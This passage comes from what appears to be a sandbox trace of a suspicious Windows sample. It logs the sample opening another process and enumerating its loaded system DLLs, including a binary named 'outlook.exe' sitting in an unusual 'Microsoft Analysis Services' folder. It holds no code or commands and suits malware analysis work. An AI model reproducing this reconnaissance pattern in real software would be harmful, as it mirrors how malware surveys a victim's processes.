"c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0055.599] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x25f4b30, cb=0x18 | out: lpmodinfo=0x25f4b30*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0055.600] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0055.601] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0055.602] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x25f6d08, cb=0x18 | out: lpmodinfo=0x25f6d08*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0055.603] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0055.604] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0055.605] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x25f8ec8, cb=0x18 | out: lpmodinfo=0x25f8ec8*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0055.606] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0055.607] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0055.608] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb20000, lpmodinfo=0x25fb1b0, cb=0x18 | out: lpmodinfo=0x25fb1b0*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0055.609] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0055.610] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0055.611] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd780000, lpmodinfo=0x25fd370, cb=0x18 | out: lpmodinfo=0x25fd370*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0055.612] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0055.613] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0055.614] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb00000, lpmodinfo=0x25ff530, cb=0x18 | out: lpmodinfo=0x25ff530*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0055.615] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0055.616] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0055.618] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x26016f0, cb=0x18 | out: lpmodinfo=0x26016f0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0055.619] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0055.620] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0055.621] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcad0000, lpmodinfo=0x26038c0, cb=0x18 | out: lpmodinfo=0x26038c0*(lpBaseOfDll=0x7fefcad0000, SizeOfImage=0x2c000, EntryPoint=0x7fefcad1860)) returned 1 [0055.623] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcad0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="umpo.dll") returned 0x8 [0055.624] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcad0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")) returned 0x1c [0055.625] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd720000, lpmodinfo=0x2605a80, cb=0x18 | out: lpmodinfo=0x2605a80*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0055.626] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd720000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0055.628] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd720000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0055.629] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdc80000, lpmodinfo=0x2607c40, cb=0x18 | out: lpmodinfo=0x2607c40*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0055.630] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0055.632] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0055.633] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpmodinfo=0x2609e10, cb=0x18 | out: lpmodinfo=0x2609e10*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0055.634] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0055.636] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0055.637] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x260bfe0, cb=0x18 | out: lpmodinfo=0x260bfe0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0055.639] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0055.640] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0055.642] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdf90000, lpmodinfo=0x260e1b0, cb=0x18 | out: lpmodinfo=0x260e1b0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0055.643] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0055.645] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0055.646] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x2610380, cb=0x18 | out: lpmodinfo=0x2610380*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0055.648] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0055.649] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0055.651] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd980000, lpmodinfo=0x2612540, cb=0x18 | out: lpmodinfo=0x2612540*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0055.653] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd980000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0055.654] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd980000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0055.656] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc80000, lpmodinfo=0x2614700, cb=0x18 | out: lpmodinfo=0x2614700*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0055.657] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pcwum.DLL") returned 0x9 [0055.659] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcwum.DLL" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0055.661] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefca40000, lpmodinfo=0x26168c0, cb=0x18 | out: lpmodinfo=0x26168c0*(lpBaseOfDll=0x7fefca40000, SizeOfImage=0x81000, EntryPoint=0x7fefca4cec8)) returned 1 [0055.663] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefca40000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rpcss.dll") returned 0x9 [0055.665] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefca40000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")) returned 0x1d [0055.667] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x2618a80, cb=0x18 | out: lpmodinfo=0x2618a80*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0055.669] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0055.670] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0055.672] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc70000, lpmodinfo=0x261ac58, cb=0x18 | out: lpmodinfo=0x261ac58*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0055.674] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0055.676] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0055.678] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff360000, lpmodinfo=0x261d030, cb=0x18 | out: lpmodinfo=0x261d030*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0055.679] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0055.681] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0055.683] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb800000, lpmodinfo=0x261f1f0, cb=0x18 | out: lpmodinfo=0x261f1f0*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0055.685] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0055.687] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0055.689] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feffae0000, lpmodinfo=0x26213b0, cb=0x18 | out: lpmodinfo=0x26213b0*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0055.691] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feffae0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0055.693] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feffae0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0055.695] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9ca0000, lpmodinfo=0x2623570, cb=0x18 | out: lpmodinfo=0x2623570*(lpBaseOfDll=0x7fef9ca0000, SizeOfImage=0x32000, EntryPoint=0x7fef9cbca90)) returned 1 [0055.698] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9ca0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmidcprv.dll") returned 0xc [0055.700] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9ca0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmidcprv.dll" (normalized: "c:\\windows\\system32\\wbem\\wmidcprv.dll")) returned 0x25 [0055.702] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpmodinfo=0x2625748, cb=0x18 | out: lpmodinfo=0x2625748*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0055.704] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0055.706] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0055.708] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9e20000, lpmodinfo=0x2627920, cb=0x18 | out: lpmodinfo=0x2627920*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0055.710] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0055.712] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0055.714] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpmodinfo=0x2629af0, cb=0x18 | out: lpmodinfo=0x2629af0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0055.716] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0055.718] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0055.720] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff970000, lpmodinfo=0x262bcb0, cb=0x18 | out: lpmodinfo=0x262bcb0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0055.723] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0055.725] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0055.727] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9c0000, lpmodinfo=0x262de70, cb=0x18 | out: lpmodinfo=0x262de70*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0055.730] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0055.732] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0055.735] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b90000, lpmodinfo=0x2630020, cb=0x18 | out: lpmodinfo=0x2630020*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0055.737] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0055.739] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0055.741] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b80000, lpmodinfo=0x26321e0, cb=0x18 | out: lpmodinfo=0x26321e0*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0055.744] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0055.746] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0055.748] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x26343b8, cb=0x18 | out: lpmodinfo=0x26343b8*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0055.751] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0055.753] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0055.755] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x2636578, cb=0x18 | out: lpmodinfo=0x2636578*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0055.758] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0055.763] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0055.765] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef98a0000, lpmodinfo=0x2638738, cb=0x18 | out: lpmodinfo=0x2638738*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0055.768] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0055.770] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0055.775] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9780000, lpmodinfo=0x263a908, cb=0x18 | out: lpmodinfo=0x263a908*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0055.778] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9780000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0055.780] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9780000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0055.783] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd830000, lpmodinfo=0x263cae0, cb=0x18 | out: lpmodinfo=0x263cae0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0055.785] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0055.788] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0055.795] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpmodinfo=0x263ecc8, cb=0x18 | out: lpmodinfo=0x263ecc8*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0055.798] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0055.800] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0055.803] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd820000, lpmodinfo=0x2640e88, cb=0x18 | out: lpmodinfo=0x2640e88*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0055.806] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd820000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0055.809] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd820000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0055.812] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbb00000, lpmodinfo=0x2643048, cb=0x18 | out: lpmodinfo=0x2643048*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0055.815] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0055.817] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0055.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba8) returned 0x21c [0055.821] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2646728, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2646728, lpcbNeeded=0x41eb20) returned 1 [0055.821] GetModuleInformation (in: hProcess=0x21c, hModule=0x1280000, lpmodinfo=0x2646998, cb=0x18 | out: lpmodinfo=0x2646998*(lpBaseOfDll=0x1280000, SizeOfImage=0x17000, EntryPoint=0x12814a1)) returned 1 [0055.822] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1280000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="outlook.exe") returned 0xb [0055.822] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1280000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Analysis Services\\outlook.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\outlook.exe")) returned 0x3e [0055.822] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2648bd0, cb=0x18 | out: lpmodinfo=0x2648bd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.822] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.823] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.823] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x264ada8, cb=0x18 | out: lpmodinfo=0x264ada8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.823] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.824] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.824] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x264cf68, cb=0x18 | out: lpmodinfo=0x264cf68*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.824] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.825] GetModuleFileNameExW (in: 